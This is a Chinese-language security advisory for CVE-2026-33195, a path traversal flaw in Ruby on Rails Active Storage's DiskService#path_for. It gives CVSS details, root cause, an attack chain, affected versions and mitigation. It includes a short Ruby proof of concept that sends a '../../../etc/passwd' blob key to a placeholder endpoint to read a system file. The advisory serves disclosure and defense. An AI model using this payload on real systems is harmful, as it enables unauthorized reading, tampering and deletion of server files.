CVE-2026-33195 Rails Active Storage路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-33195

漏洞类型

路径遍历

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ruby on Rails Active Storage

漏洞概述

Ruby on Rails的Active Storage组件存在一个严重的路径遍历漏洞。在受影响的版本中，`DiskService#path_for`方法未对解析后的文件系统路径进行有效性验证，未能确保其保持在存储根目录内。如果应用程序将用户输入作为blob键传递，攻击者可以通过构造包含路径遍历序列（如`../`）的键值，读取、写入或删除服务器上的任意文件。该漏洞可能导致敏感信息泄露、数据篡改或系统拒绝服务，且攻击无需认证且无需用户交互，影响范围极广。

技术细节

该漏洞的根本原因在于Ruby on Rails Active Storage组件中的`DiskService`类未能妥善处理文件路径的安全边界。具体而言，`DiskService#path_for`方法负责将抽象的blob key转换为服务器上的实际物理路径。在正常的设计模式下，blob key应当是由系统生成的不可预测字符串（例如UUID），因此开发者往往假定该输入是安全的。然而，若应用程序错误地将用户可控的输入直接用作blob key，攻击者便有机会注入恶意路径。当构造的key中包含`../`（父目录引用）或`..\`（Windows路径）等序列时，路径拼接操作会导致解析后的路径跳出预定的存储根目录。由于该旧版本代码未对最终路径进行规范化或验证其是否位于根目录之内，攻击者便能借此访问文件系统上的任意位置。这不仅允许读取敏感配置文件（如数据库凭证、环境变量），还可能导致覆盖关键系统文件或删除Web应用代码，从而造成严重的数据泄露和系统沦陷。

攻击链分析

STEP 1

侦察

攻击者识别目标应用使用的是Ruby on Rails框架，并启用了Active Storage的DiskService服务。

STEP 2

武器化

攻击者构造包含路径遍历字符（如`../`）的恶意blob key，旨在访问存储根目录之外的敏感文件（如/etc/passwd）。

STEP 3

交付

攻击者向Active Storage的处理端点发送请求，将恶意构造的key作为参数传递。

STEP 4

利用

服务器端的`DiskService#path_for`处理该key，由于未验证路径边界，解析后的路径指向了系统敏感文件。

STEP 5

影响

攻击者成功读取、修改或删除了服务器上的任意文件，可能导致服务器完全被控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual Proof of Concept for CVE-2026-33195
# This demonstrates how a malicious blob key can lead to path traversal.

require 'net/http'

# Target URL (hypothetical endpoint that processes blob keys)
url = 'http://vulnerable-rails-app.com/rails/active_storage/disk'
uri = URI(url)

# Construct a malicious payload
# The 'key' parameter often expects a UUID, but if it accepts user input:
# Using '../' sequences to traverse out of the storage root
malicious_key = '../../../etc/passwd'

# Request parameters
params = {
  'key' => malicious_key,
  'content_type' => 'text/plain'
}

begin
  # Sending the request
  response = Net::HTTP.post_form(uri, params)

  # If the vulnerability exists, the server may respond with the content of /etc/passwd
  if response.code == '200'
    puts "[+] Exploit Successful!"
    puts "[+] Response Body:"
    puts response.body
  else
    puts "[-] Exploit Failed or Patched. Status: #{response.code}"
  end
rescue StandardError => e
  puts "[-] Error: #{e.message}"
end

影响范围

Ruby on Rails Active Storage < 7.2.3.1

Ruby on Rails Active Storage >= 8.0.0, < 8.0.4.1

Ruby on Rails Active Storage >= 8.1.0, < 8.1.2.1

防御指南

临时缓解措施

如果无法立即升级，请全面审查应用程序代码，确保传递给Active Storage的blob key完全由后端控制，严禁直接使用用户可控的输入。可以在控制器层增加严格的输入验证逻辑，过滤或拦截包含`../`、`..\`或绝对路径字符的参数，以此作为临时缓解方案。